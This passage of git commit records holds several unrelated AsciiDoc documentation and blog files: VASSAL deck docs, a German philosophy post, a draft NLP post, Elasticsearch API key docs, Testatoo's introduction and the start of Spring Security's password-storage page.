<expression>\n....\n+\nFor each expression, a map-level property called __<deckName>_<expression name>__ is exposed.\nThe exposed value is number of pieces for which that expression evaluates to _true_.\nAn example of how to do this is provided below.\n\nNOTE: Currently the only \"dynamic\" property which can be used in counting expressions is _playerSide_.\nOther dynamic properties will most likely not update if they change after pieces move into a deck.\n\n\n|image:images\/Deck.png[]\n\n|===\n\n'''''\n\n=== Sub-Components\n\nSub-Components can be added to a Deck by right-clicking on the _[Deck]_ entry in the Module Editor and selecting the appropriate _Add_ option.\n\n[width=\"100%\",cols=\"50%a,^50%a\",]\n|===\na|\n==== <<GamePiece.adoc#top,Card>>\n\nA Card is identical to a Game Piece, but is initialized with a <<Mask.adoc#top,Mask>> trait appropriate for a playing card.\n\n==== <<DeckGlobalKeyCommand.adoc#top,Deck Global Key Command>>\n\nGlobal Key Commands can be added to a Deck and will appear in the right-click context menu of the Deck.\nThe resulting Global Key Command will be applied _only_ to pieces contained in the Deck.\n\n==== <<DeckSendKeyCommand.adoc#top,Deck Send Key Command>>\nA Deck Send Key Command adds a command to the right-click context menu of the Deck that provides extended options for sending cards in this Deck to another Deck.\n\n==== <<DeckSortKeyCommand.adoc#top,Deck Sort Key Command>>\nA Deck Sort Key Commands adds a command to the right-click context menu of the Deck that allows the Deck to be sorted based on the values of properties on the contained cards.\n\n|image:images\/DeckAdd.png[] +\n|===\n\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"b765616720e5bdc90216a957b3dc1998d90de4e6","subject":"Update 2016-07-09-Unspezifitat-und-Risiko-komplexer-Kompensation.adoc","message":"Update 2016-07-09-Unspezifitat-und-Risiko-komplexer-Kompensation.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2016-07-09-Unspezifitat-und-Risiko-komplexer-Kompensation.adoc","new_file":"_posts\/2016-07-09-Unspezifitat-und-Risiko-komplexer-Kompensation.adoc","new_contents":"# Unspezifit\u00e4t und Risiko komplexer Kompensation\n:hp-tags: Kompensation, Blumenberg,\n\nIn seinem Blog http:\/\/www.reis.space[Critical Otter Studies] unterscheidet _@reisagainst_\nzwei Arten von Kompensation:\n\n> 1. Ein Leistungsverlust wird von einem System durch erh\u00f6hte Aktivit\u00e4t ausgeglichen\n> (zB. eines Organs) - nennen wir das primitive Kompensation\n>\n> 2. Eine Funktion, die bisher auf primitivere Weise gel\u00f6st wurde, wird nun durch\n> Auslagerung scheinbar aufgegeben und in komplexerer Weise erf\u00fcllt.\n>\n> http:\/\/www.reis.space\/jekyll\/update\/2016\/06\/30\/kompensation.html[\u2013 Critical Otter Studies \u2013 *Kompensation und poetisches Lesen*]\n\nLetzteres aber erfordert vorerst eine _wirkliche_ Aufgabe, die nur nach erfolgreicher Auslagerung der Funktion zur scheinbaren wird.\nDeren Gelingen kann nicht vorhergesagt werden, da eine komplexe Kompensation von einem nicht-komplexen Standpunkt keiner Beurteilung zug\u00e4ngig ist. In diesem Sinne ist Kompensation immer unspezifisch und risikoreich. Die Frage ist nun: Weshalb kommt es zu einer solchen Gef\u00e4hrdung?\n\nMit dem _Dilemma der H\u00f6hle_ f\u00e4ngt alles an. Trotz deren defizit\u00e4ren Angepa\u00dftheit bot die H\u00f6hle Schutz und Obdach auch den Schwachen und Kranken.\n\n> Diese Kinder der H\u00f6hle, die niemals das Recht der St\u00e4rkeren und das der jagenden Ern\u00e4hrer\n> f\u00fcr sich geltend machen konnte, erfanden den Mechanismus der Kompensation.\n>\n> \u2013 Hans Blumenberg: *H\u00f6hlenausg\u00e4nge*, Frankfurt a.M., 2. Aufl., 1989, *28*\n\nWeil die H\u00f6hle zur Nahrungssuche zu verlassen, ihnen nicht m\u00f6glich ist, ersetzen sie den Bericht \u00fcber Geschehenes durch die Erz\u00e4hlung von Erdachtem.\nIst die Sprache des J\u00e4gers von den N\u00f6ten der Wirklichkeit, aber vor allem der Selbsterhaltung gepr\u00e4gt, kompensiert der Schwache\nLeistungs- und Erfahrungsdefizit mit der sprachlichen Konstruktion von Wirklichkeiten\nund transformiert derma\u00dfen die Bedingungen, d.h. Bewertungskriterien, zu _Narrationen als\nNarrativen_. Konnte der Bericht zuvor nur _als_ Bericht an seinen eigenen Gelingenskriterien bewertet werden,\nmu\u00df er sich nun als sinnstiftende Erz\u00e4hlform neben anderen beweisen.\n\nAls primitive Kompensation kann die Erz\u00e4hlung \u2013 und sei sie noch\nso gekonnt \u2013 den Bericht nicht ersetzen. Aber die konkrete Kompensation fiktiver und konjunktiver Erz\u00e4hlung bedingt und wird bedingt durch\ndie Kompensationsleistung des Narrativs. Auch der Bericht mu\u00df sich dieser zwingend unterordnen.\nDie nun m\u00f6glichen Fragen und Forderungen lassen sich nicht mehr eliminieren sondern nur ignorieren. Eine Ignoranz, die gr\u00f6\u00dfte Anstrenung zur Verdr\u00e4ngung erfordern w\u00fcrde. Das Narrativ erlaubt eine v\u00f6llig neue\nForm der _actio per distans_ (Blumenberg) und somit eine neue Art, Widerfahrnissen (Kamlah) und Widerst\u00e4nden\n(Cassirer) der Wirklichkeit zu begegnen und vor allem diese zu bew\u00e4ltigen.\n\nAus dieser Erz\u00e4hlung \u2013 deren Evidenz nicht von der \u00dcberpr\u00fcfbarkeit ihrer Aussagen an\nder Menschheitsgeschichte abh\u00e4ngt und damit selbst zum Beispiel f\u00fcr ihren Inhalt wird \u2013\nk\u00f6nnen die Erm\u00f6glichungsbedingungen komplexer Kompensation durch Auslagerung abstrahiert werden:\n\nSchutz durch Best\u00e4ndigkeit der Gemeinschaft, innerhalb derer nicht alle zugleich\nsondern vorerst nur einzelne Mitglieder zur Kompensation sich gen\u00f6tigt f\u00fchlen. Es gilt:\n\n> Wie so oft, beg\u00fcnstigt die Starrheit in einem Teil des Systems seine Elastizit\u00e4t in den anderen Teilen.\n>\n> \u2013 Blumenberg: *\u201eExistenzrisiko und Pr\u00e4vention\u201c*, in: *Beschreibung des Menschen*,\nFrankfurt a.M., 1. Aufl., 2016, 550-622, hier *558*\n\nWeil derart durch andere vor fatalem Scheitern (Tod) gesch\u00fctzt, k\u00f6nnen einzelne\ndas Risiko unspezifischer Kompensationsversuche wagen.\nErst bei Erfolg komplexer Kompensation durch Auslagerung und die dadurch er\u00f6ffneten M\u00f6glichkeiten\nwird die Gemeinschaft insgesamt die kompensatorischen Methoden \u00fcbernehmen.\n\n### post scriptum\n\nEs lohnt die Suche nicht, in Blumenbergs Schriften zu finden, was ich hereingelesen habe.\nMit n\u00e4rrischer Frechheit habe ich seine Ans\u00e4tze gestohlen, auf fremdes Terrain entf\u00fchrt\nund bin mit ihnen umgesprungen, als w\u00e4ren es meine eigenen.","old_contents":"# Unspezifit\u00e4t und Risiko komplexer Kompensation\n:hp-tags: Kompensation, Blumenberg,\n\n_@reisagains_ unterscheidet in seinem Blog http:\/\/www.reis.space[Critical Otter Studies]\nzwei Arten von Kompensation:\n\n> 1. Ein Leistungsverlust wird von einem System durch erh\u00f6hte Aktivit\u00e4t ausgeglichen\n> (zB. eines Organs) - nennen wir das primitive Kompensation\n>\n> 2. Eine Funktion, die bisher auf primitivere Weise gel\u00f6st wurde, wird nun durch\n> Auslagerung scheinbar aufgegeben und in komplexerer Weise erf\u00fcllt.\n>\n> http:\/\/www.reis.space\/jekyll\/update\/2016\/06\/30\/kompensation.html[\u2013Critical Otter Studies \u2013 *Kompensation und poetisches Lesen*]\n\nLetzteres aber erfordert vorerst eine _wirkliche_ Aufgabe, die nur nach erfolgreicher Auslagerung der Funktion zur scheinbaren wird.\nDeren Gelingen kann allerdings nicht vorhergesagt werden, da eine komplexe Kompensation von einem nicht-komplexen Standpunkt keiner Beurteilung zug\u00e4ngig ist. In diesem Sinne ist Kompensation immer unspezifisch und risikoreich. Die Frage ist nun: Weshalb kommt es zu einer solchen Gef\u00e4hrdung?\n\nMit dem _Dilemma der H\u00f6hle_ f\u00e4ngt alles an. Trotz deren defizit\u00e4ren Angepa\u00dftheit bot die H\u00f6hle Schutz und Obdach auch den Schwachen und Kranken.\n\n> Diese Kinder der H\u00f6hle, die niemals das Recht der St\u00e4rkeren und das der jagenden Ern\u00e4hrer\n> f\u00fcr sich geltend machen konnte, erfanden den Mechanismus der Kompensation.\n>\n> \u2013Hans Blumenberg: *H\u00f6hlenausg\u00e4nge*, Frankfurt a.M., 2. Aufl., 1989, *28*\n\nWeil die H\u00f6hle zur Nahrungssuche zu verlassen, ihnen nicht m\u00f6glich war, ersetzen sie den Bericht v Geschehenen durch die Erz\u00e4hlung von Erdachtem.\nIst die Sprache des J\u00e4gers von den N\u00f6ten der Wirklichkeit, aber vor allem der Selbsterhaltung gepr\u00e4gt, kompensiert der Schwache\nLeistungs- und Erfahrungsdefizit mit der sprachlichen Konstruktion von Wirklichkeiten\nund transformiert derma\u00dfen die Bedingungen, d.h. Bewertungskriterien, zu _Narrationen als\nNarrativen_. Konnte der Bericht zuvor nur _als_ Bericht an seinen eigenen Gelingenskriterien bewertet werden,\nmu\u00df er sich nun als sinnstiftende Erz\u00e4hlform neben anderen beweisen.\n\nAls primitive Kompensation kann die Erz\u00e4hlung \u2013 und sei sie noch\nso gekonnt \u2013 den Bericht nicht ersetzen. Aber die konkrete Kompensation fiktiver und konjunktiver Erz\u00e4hlung bedingt und wird bedingt durch\ndie Kompensationsleistung des Narrativs. Dieser mu\u00df auch der Bericht sich zwingend unterordnen.\nDie nun m\u00f6glichen Fragen und Forderungen lassen sich nicht mehr eliminieren und k\u00f6nnten\nnur ignoriert, verschwiegen, verdr\u00e4ngt werden. Allerdings erlaubt das Narrativ eine v\u00f6llig neue\nForm der _actio per distans_ (Blumenberg) und somit eine neue Art, Widerfahrnissen (Kamlah) und Widerst\u00e4nden\n(Cassirer) der Wirklichkeit zu begegnen und diese zu bew\u00e4ltigen.\n\nAus dieser Erz\u00e4hlung \u2013 deren Evidenz nicht von der \u00dcberpr\u00fcfbarkeit ihrer Aussagen an\nder Menschheitsgeschichte abh\u00e4ngt, und damit selbst zum Beispiel f\u00fcr ihren Inhalt wird \u2013\nk\u00f6nnen die Erm\u00f6glichungsbedingungen komplexer Kompensation durch Auslagerung abstrahiert werden:\n\nSchutz durch Best\u00e4ndigkeit der Gemeinschaft, innerhalb derer nicht alle zugleich\nsondern vorerst nur einzelne Mitglieder zu Kompensation sich gen\u00f6tigt f\u00fchlen. Es gilt:\n\n> Wie so oft, beg\u00fcnstigt die Starrheit in einem Teil des Systems seine Elastizit\u00e4t in den anderen Teilen.\n>\n> \u2013 Hans Blumenberg: *\u201eExistenzrisiko und Pr\u00e4vention\u201c*, in: *Beschreibung des Menschen*,\nFrankfurt a.M., 1. Aufl., 2016, 550-622, hier *558*\n\nWeil derart durch andere vor fatalem Scheitern (Tod) gesch\u00fctzt, k\u00f6nnen einzelne\ndas Risiko unspezifischer Kompensationsversuche wagen.\nErst bei Erfolg komplexer Kompensation durch Auslagerung und die dadurch er\u00f6ffneten M\u00f6glichkeiten\nwird die Gemeinschaft insgesamt die kompensatorischen Methoden \u00fcbernehmen.\n\n### post scriptum\n\nEs lohnt die Suche nicht, in Blumenbergs Schriften zu finden, was ich hereingelesen habe.\nMit n\u00e4rrischer Frechheit habe ich seine Ans\u00e4tze gestohlen, auf fremdes Terrain entf\u00fchrt\nund bin mit ihnen umgesprungen, als w\u00e4ren es meine eigenen.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f70837c2c5d9637376f780a9fbf80ae2e01bfc9f","subject":"Update 2016-09-12-Natural-language-modeling-how-deep-is-too-deep.adoc","message":"Update 2016-09-12-Natural-language-modeling-how-deep-is-too-deep.adoc","repos":"ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io","old_file":"_posts\/2016-09-12-Natural-language-modeling-how-deep-is-too-deep.adoc","new_file":"_posts\/2016-09-12-Natural-language-modeling-how-deep-is-too-deep.adoc","new_contents":"= Natural language modeling: how deep is too\u00a0deep?\n:hp-tags: Deep Learning, NLP\n\n[.lead]\nIs Deep Learning always the best tool for Natural Language Understanding tasks? Not necessarily!\n\nRecently, a new paper from Google research appeared on arXiv [1], immediately catching the attention of the NLP community. Focusing \non the problem of Natural Language Inference (NLI), the paper made a convincing case for the overall superiority of ... *shallow* \nsentence representations - as opposed to deep ones - for NLU tasks such as NLI. Furthermore, this paper is but one example in \nthe recent slew of results casting the efficacy of Deep NN architectures into question for text-related tasks. Not the least of which was \nFAIR's FastText[2] (essentially a simple modification of the unsupervised Word2Vec algorithm to deal with supervised learning tasks). \nSee also here[3] and here[4]. \n\nNot familiar with NLI and why it is an important litmus test? Fear not: this paragraph is about to fill you in! \n(For reasers familiar with the terminology, feel free to skip to the next paragraph). \n<------->NLI EXPLANATION HERE <--------->\n\nHold on, you might say, isn't Deep Learning a new disruptive force in AI, shown beyond doubt to be clearly superior to prior \"shallow\"\nlearning approaches? Well, it depends who you ask. Ask a Computer Vision or a Speech Recognition guy, and you'll get and enthusiastic Yes!\nIn (computer) vision, novel DL archirectures (such as VGG, GoogleNet, Inception, etc.) have delivered extremely impressive \nresults on ImageNet, CIFAR, even defying expectations of some DL champions in vision [5]. In ASR, commercial heaviweights such as \nGoogle and Baidu have longs since switch to DL architectures. It should only be natural to expect, then, to see the \nsame trend in NLP\/NLU, correct? \nWell, not so fast. \n\nThe tide of enthusiasm in Deep Learning has of course spilled over to the NLU community, triggering a massive conversion of both \nacademics and industry practitioners to the newfound DL religion. Impressive results from other fields, \nhelped by the success of the seminal Word2Vec[6] (followed by Glove[7] and the like) was too much to resist. \nRNN and LSTM have since become mainstream techniques, offered by \npopular DL libraries such as TensorFlow, Keras, DL4J, etc. Among other big companies, Google has been at the forefront of both \nmigrating to DL for text machine learning tasks (such as translation[8], SmartReply[9], etc.)\n\nSo, you ask? Isn't that enough? Well, dear friend: if you are reading this, chances are, you are not Google! And as a result, you \ndon't have the same massive amounts of training data, nor their virtually unlimited computational resources. To the rest of us, \nit is important to understand the performance\/computation tradeoffs that come with DL - which is what this post is really about. \n\nSo let us look at some key problems one by one. \n\n*** Subsection: \u0422ext Classification ***\nCommon task with plenty of applications: search, intent classification, sentiment analysis, topic modeling \n(slightly different, but close), seqeuence labeling (related), etc. \nFor text classification, we typically have 3 options: \nA) Logit or RF with nag of words or averaged word vectors. \nB) Shallow neural networks such as FastText\nC) Deep networks such as RNNs\/LSTMs or CNNs. \n\nRecurrent Neural Networks (RNNs) are category of NN-based models designed specifically for sequences of arbitrary length. \nWhich makes particularly attractive tool for modeling text. \n(2 sentences on RNN + picture: vector representation, etc.). However, in practice, RNNs can be hard to train and for small to medium-sized training datasest \n, good old classifiers such as Logistic Regression or Random Forest (using a bag of words representation) can often deliver similar or even superior \nperformance at a lower computational cost. Even in the Deep Learning category, RNNs have a strong competitor in ConvNets \n(a.k.a. Convolutional Neural Nets or CNNs) - just as long as your text can be treated as fixed length sequences, making them a suitable approach \nto represent and classify tweets, text messages, short user reviews, etc. Still, it's too early to dismiss RNNs and their variants entirely. \nHere is an important distinction to realize. Many traditional classification methods aim to learn a feature space partitioning function\n(as a means to separate samples of different classes), leaving feature engineering to the application developer. Conversely, neural networks\nactually do more than that: they seek to learn the optimal representation (read: N-dimensional vector encoding of your data points: \npixels, words, sentences, pages, what have you...) so as to minimize the (problem-dependent) loss function on the training set. That learned \nrepresentation is a byproduct that can sometimes be more valuable than the main task. For instance, in Word2Vec, the task is predicting a word \nbased on the words around it (or vice-versa), which admittedly is not a very common problem in reality. However, as a byproduct, we get word vectors \nwith very interesting semantic properties (link) that become handy in text classification and other application. \n\n\n\nSubsection: NLI and machine translation. \nWhy is NLI important ? It's a key problem in natural language understanding. Many other NLU problems can be reduced to NLI: such as summarization \n(given a piece of text and a suggested summary, does the former entail the latter), information extraction (does the text entail the extracted fact), \nquestion answering (does the data source entail a given question and answer pair) as well as machine machine translation \n(does a phrase in language A entail its given translation in language B and vice versa).\nWhy is it mentioned in the same category as machine translation? Both can be cast as an alignment problem. \n\n\nSubsection: Question Answering \n\n\n\nSubsection: Reading comprehension, memory and attention. \n\n\nSubsection: Dialogue and chatbots! \n\n\nSo why hs DL been more successful in ASR and vision than NLP\/NLU? That's a topic for another post! \n\n\n\n[1] http:\/\/arxiv.org\/pdf\/1606.01933v1.pdf [A Decomposable Attention Model for Natural Language Inference] \n[2]\n[3]\n[4]\n[5] Karpathy\n[6] Word2Vec\n[7] Glove\n[8] Google Translate\n[9] Smart Reply\n[10] http:\/\/www.foldl.me\/2016\/solving-language\/\n\n \n\n","old_contents":"= Natural language modeling: how deep is too\u00a0deep?\n:hp-tags: Deep Learning, NLP\n\n[.lead]\nIs Deep Learning always the best tool for Natural Language Understanding tasks? Not necessarily!\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"56b3826e3f052448a91a66b0054bef7aea9831eb","subject":"[DOCS] Add warning about derived API keys to docs (#62351)","message":"[DOCS] Add warning about derived API keys to docs (#62351)\n\n","repos":"robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"x-pack\/docs\/en\/rest-api\/security\/create-api-keys.asciidoc","new_file":"x-pack\/docs\/en\/rest-api\/security\/create-api-keys.asciidoc","new_contents":"[role=\"xpack\"]\n[[security-api-create-api-key]]\n=== Create API key API\n++++\n<titleabbrev>Create API keys<\/titleabbrev>\n++++\n\nCreates an API key for access without requiring basic authentication.\n\n[[security-api-create-api-key-request]]\n==== {api-request-title}\n\n`POST \/_security\/api_key`\n\n`PUT \/_security\/api_key`\n\n[[security-api-create-api-key-prereqs]]\n==== {api-prereq-title}\n\n* To use this API, you must have at least the `manage_api_key` cluster privilege.\n\nIMPORTANT: If the credential that is used to authenticate this request is\nan API key, the derived API key cannot have any privileges. If you specify privileges, the API returns an error.\nSee the note under `role_descriptors`.\n\n[[security-api-create-api-key-desc]]\n==== {api-description-title}\n\nThe API keys are created by the {es} API key service, which is automatically enabled\nwhen you configure TLS on the HTTP interface. See <<tls-http>>. Alternatively,\nyou can explicitly enable the `xpack.security.authc.api_key.enabled` setting. When \nyou are running in production mode, a bootstrap check prevents you from enabling \nthe API key service unless you also enable TLS on the HTTP interface. \n\nA successful create API key API call returns a JSON structure that contains the\nAPI key, its unique id, and its name. If applicable, it also returns expiration\ninformation for the API key in milliseconds. \n\nNOTE: By default, API keys never expire. You can specify expiration information\nwhen you create the API keys. \n\nSee <<api-key-service-settings>> for configuration settings related to API key\nservice.\n\n\n[[security-api-create-api-key-request-body]]\n==== {api-request-body-title}\n\nThe following parameters can be specified in the body of a POST or PUT request:\n\n`name`::\n(Required, string) Specifies the name for this API key.\n\n`role_descriptors`::\n(Optional, array-of-role-descriptor) An array of role descriptors for this API\nkey. This parameter is optional. When it is not specified or is an empty array,\nthen the API key will have a _point in time snapshot of permissions of the \nauthenticated user_. If you supply role descriptors then the resultant permissions\nwould be an intersection of API keys permissions and authenticated user's permissions\nthereby limiting the access scope for API keys.\nThe structure of role descriptor is the same as the request for create role API.\nFor more details, see <<security-api-put-role, create or update roles API>>.\n+\n--\nNOTE: Due to the way in which this permission intersection is calculated, it is not\npossible to create an API key that is a child of another API key, unless the derived\nkey is created without any privileges. In this case, you must explicitly specify a\nrole descriptor with no privileges. The derived API key can be used for\nauthentication; it will not have authority to call {es} APIs.\n\n--\n\n`expiration`::\n(Optional, string) Expiration time for the API key. By default, API keys never\nexpire.\n\n\n[[security-api-create-api-key-example]]\n==== {api-examples-title}\n\nThe following example creates an API key:\n\n[source,console]\n------------------------------------------------------------\nPOST \/_security\/api_key\n{\n \"name\": \"my-api-key\",\n \"expiration\": \"1d\", <1>\n \"role_descriptors\": { <2>\n \"role-a\": {\n \"cluster\": [\"all\"],\n \"index\": [\n {\n \"names\": [\"index-a*\"],\n \"privileges\": [\"read\"]\n }\n ]\n },\n \"role-b\": {\n \"cluster\": [\"all\"],\n \"index\": [\n {\n \"names\": [\"index-b*\"],\n \"privileges\": [\"all\"]\n }\n ]\n }\n }\n}\n------------------------------------------------------------\n<1> optional expiration for the API key being generated. If expiration is not\n provided then the API keys do not expire.\n<2> optional role descriptors for this API key, if not provided then permissions\n of authenticated user are applied.\n\nA successful call returns a JSON structure that provides\nAPI key information.\n\n[source,console-result]\n--------------------------------------------------\n{\n \"id\":\"VuaCfGcBCdbkQm-e5aOx\", <1>\n \"name\":\"my-api-key\",\n \"expiration\":1544068612110, <2>\n \"api_key\":\"ui2lp2axTNmsyakw9tvNnw\" <3>\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/VuaCfGcBCdbkQm-e5aOx\/$body.id\/]\n\/\/ TESTRESPONSE[s\/1544068612110\/$body.expiration\/]\n\/\/ TESTRESPONSE[s\/ui2lp2axTNmsyakw9tvNnw\/$body.api_key\/]\n<1> unique id for this API key\n<2> optional expiration in milliseconds for this API key\n<3> generated API key\n\nThe API key returned by this API can then be used by sending a request with an\n`Authorization` header with a value having the prefix `ApiKey` followed\nby the _credentials_, where _credentials_ are the base64 encoding of `id` and `api_key` joined by a colon.\n\nNOTE: If your node has `xpack.security.http.ssl.enabled` set to `true`, then you must specify `https` when creating your API key.\n\n[source,shell]\n--------------------------------------------------\ncurl -H \"Authorization: ApiKey VnVhQ2ZHY0JDZGJrUW0tZTVhT3g6dWkybHAyYXhUTm1zeWFrdzl0dk5udw==\" http:\/\/localhost:9200\/_cluster\/health\n--------------------------------------------------\n\/\/ NOTCONSOLE\n","old_contents":"[role=\"xpack\"]\n[[security-api-create-api-key]]\n=== Create API key API\n++++\n<titleabbrev>Create API keys<\/titleabbrev>\n++++\n\nCreates an API key for access without requiring basic authentication.\n\n[[security-api-create-api-key-request]]\n==== {api-request-title}\n\n`POST \/_security\/api_key`\n\n`PUT \/_security\/api_key`\n\n[[security-api-create-api-key-prereqs]]\n==== {api-prereq-title}\n\n* To use this API, you must have at least the `manage_api_key` cluster privilege.\n\n[[security-api-create-api-key-desc]]\n==== {api-description-title}\n\nThe API keys are created by the {es} API key service, which is automatically enabled\nwhen you configure TLS on the HTTP interface. See <<tls-http>>. Alternatively,\nyou can explicitly enable the `xpack.security.authc.api_key.enabled` setting. When \nyou are running in production mode, a bootstrap check prevents you from enabling \nthe API key service unless you also enable TLS on the HTTP interface. \n\nA successful create API key API call returns a JSON structure that contains the\nAPI key, its unique id, and its name. If applicable, it also returns expiration\ninformation for the API key in milliseconds. \n\nNOTE: By default, API keys never expire. You can specify expiration information\nwhen you create the API keys. \n\nSee <<api-key-service-settings>> for configuration settings related to API key\nservice.\n\n\n[[security-api-create-api-key-request-body]]\n==== {api-request-body-title}\n\nThe following parameters can be specified in the body of a POST or PUT request:\n\n`name`::\n(Required, string) Specifies the name for this API key.\n\n`role_descriptors`::\n(Optional, array-of-role-descriptor) An array of role descriptors for this API\nkey. This parameter is optional. When it is not specified or is an empty array,\nthen the API key will have a _point in time snapshot of permissions of the \nauthenticated user_. If you supply role descriptors then the resultant permissions\nwould be an intersection of API keys permissions and authenticated user's permissions\nthereby limiting the access scope for API keys.\nThe structure of role descriptor is the same as the request for create role API.\nFor more details, see <<security-api-put-role, create or update roles API>>.\n\n`expiration`::\n(Optional, string) Expiration time for the API key. By default, API keys never\nexpire.\n\n\n[[security-api-create-api-key-example]]\n==== {api-examples-title}\n\nThe following example creates an API key:\n\n[source,console]\n------------------------------------------------------------\nPOST \/_security\/api_key\n{\n \"name\": \"my-api-key\",\n \"expiration\": \"1d\", <1>\n \"role_descriptors\": { <2>\n \"role-a\": {\n \"cluster\": [\"all\"],\n \"index\": [\n {\n \"names\": [\"index-a*\"],\n \"privileges\": [\"read\"]\n }\n ]\n },\n \"role-b\": {\n \"cluster\": [\"all\"],\n \"index\": [\n {\n \"names\": [\"index-b*\"],\n \"privileges\": [\"all\"]\n }\n ]\n }\n }\n}\n------------------------------------------------------------\n<1> optional expiration for the API key being generated. If expiration is not\n provided then the API keys do not expire.\n<2> optional role descriptors for this API key, if not provided then permissions\n of authenticated user are applied.\n\nA successful call returns a JSON structure that provides\nAPI key information.\n\n[source,console-result]\n--------------------------------------------------\n{\n \"id\":\"VuaCfGcBCdbkQm-e5aOx\", <1>\n \"name\":\"my-api-key\",\n \"expiration\":1544068612110, <2>\n \"api_key\":\"ui2lp2axTNmsyakw9tvNnw\" <3>\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/VuaCfGcBCdbkQm-e5aOx\/$body.id\/]\n\/\/ TESTRESPONSE[s\/1544068612110\/$body.expiration\/]\n\/\/ TESTRESPONSE[s\/ui2lp2axTNmsyakw9tvNnw\/$body.api_key\/]\n<1> unique id for this API key\n<2> optional expiration in milliseconds for this API key\n<3> generated API key\n\nThe API key returned by this API can then be used by sending a request with an\n`Authorization` header with a value having the prefix `ApiKey` followed\nby the _credentials_, where _credentials_ are the base64 encoding of `id` and `api_key` joined by a colon.\n\nNOTE: If your node has `xpack.security.http.ssl.enabled` set to `true`, then you must specify `https` when creating your API key.\n\n[source,shell]\n--------------------------------------------------\ncurl -H \"Authorization: ApiKey VnVhQ2ZHY0JDZGJrUW0tZTVhT3g6dWkybHAyYXhUTm1zeWFrdzl0dk5udw==\" http:\/\/localhost:9200\/_cluster\/health\n--------------------------------------------------\n\/\/ NOTCONSOLE\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc3fc6a44ac689f267b5f15e6cbd68874b46f3ac","subject":"Add documentation","message":"Add documentation\n","repos":"Ovea\/testatoo,Ovea\/testatoo","old_file":"testatoo-documentation\/doc\/testatoo.adoc","new_file":"testatoo-documentation\/doc\/testatoo.adoc","new_contents":"= Testatoo documentation\nv2.0, 2014\n:toc:\n:doctype: book\n:icons: font\n:source-highlighter: highlightjs\n:imagesdir: images\n:homepage: https:\/\/github.com\/Ovea\/testatoo\n:desc: This is the documentation of Testatoo\n\nimage:logo.png[float=\"left\"]\n\n= Introduction\n\nTestatoo is a web user interface testing tool. It's the result of numerous real-world observations of developers in the trenches in the area of GUI testing.\nWorking for many years to promote the TDD approaches, we often faced difficulties in their implementation for the graphical layer of applications.\n\nThe \"test FIRST\" principle excludes all scenario recorder based approaches that only allow you to write a posteriori tests.\nOur experience has taught us that this path is a dead end (but we reserve this for another discussion...).\n\nAnother problem is GUI tests are brittle and costly! We do think that this is due to the lack of abstraction in existing UI testing tools.\n\nTestatoo provides on one hand an abstraction of the UI business domain through an expressive API and on the other hand a way to express this domain via a DSL (a button semantically stays a buttons whatever the technology).\nWith Testatoo you can therefore write tests with a seldom achieved level of expressiveness and make these tests INDEPENDENT of the underlying technology.\n\nTestatoo can therefore transform the test in real assets, present throughout the life of the application and always in tune with the latest version of the application.\n\n= Technologies\n\nTestatoo is built on top of [WebDriver](http:\/\/code.google.com\/p\/selenium\/), it can work [with any browser supported by WebDriver](http:\/\/http:\/\/code.google.com\/p\/selenium\/wiki\/FrequentlyAskedQuestions#Q:_Which_browsers_does_WebDriver_support?) (IE, Google-chrome, Firefox, ...).\nTestatoo provides like [geb](http:\/\/www.gebish.org\/testing) an extra layer of convenience and productivity, it is always possible to \"fallback\" to the WebDriver level to do something directly should you need to.\nBut Testatoo adds a powerful DSL while maintaining the usage of pure Java and keeps the advantage of a strong typed language.\n\nExample of a test syntax :\n\n[source, java]\n.Listing 1.0 : a sample syntax\n-------------------------------------------------------------------------------\n assertThat textField has label('Text')\n assertThat textField has placeholder('Text')\n assertThat textField is empty\n-------------------------------------------------------------------------------","old_contents":"= Testatoo documentation\nv2.0, 2014\n:toc:\n:doctype: book\n:icons: font\n:source-highlighter: highlightjs\n:imagesdir: images\n:homepage: https:\/\/github.com\/Ovea\/testatoo\n:desc: This is the documentation of Testatoo\n\n[preface]\n= TODO\n\nimage:logo.png[float=\"left\"]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bb99d7d95ac2d31874b93e84bb584c3f0cf52cb6","subject":"Fix return type for NoOpPasswordEncoder bean in documentation","message":"Fix return type for NoOpPasswordEncoder bean in documentation\n","repos":"spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security","old_file":"docs\/modules\/ROOT\/pages\/features\/authentication\/password-storage.adoc","new_file":"docs\/modules\/ROOT\/pages\/features\/authentication\/password-storage.adoc","new_contents":"[[authentication-password-storage]]\n= Password Storage\n\nSpring Security's `PasswordEncoder` interface is used to perform a one way transformation of a password to allow the password to be stored securely.\nGiven `PasswordEncoder` is a one way transformation, it is not intended when the password transformation needs to be two way (i.e. storing credentials used to authenticate to a database).\nTypically `PasswordEncoder` is used for storing a password that needs to be compared to a user provided password at the time of authentication.\n\n[[authentication-password-storage-history]]\n== Password Storage History\n\nThroughout the years the standard mechanism for storing passwords has evolved.\nIn the beginning passwords were stored in plain text.\nThe passwords were assumed to be safe because the data store the passwords were saved in required credentials to access it.\nHowever, malicious users were able to find ways to get large \"data dumps\" of usernames and passwords using attacks like SQL Injection.\nAs more and more user credentials became public security experts realized we needed to do more to protect users' passwords.\n\nDevelopers were then encouraged to store passwords after running them through a one way hash such as 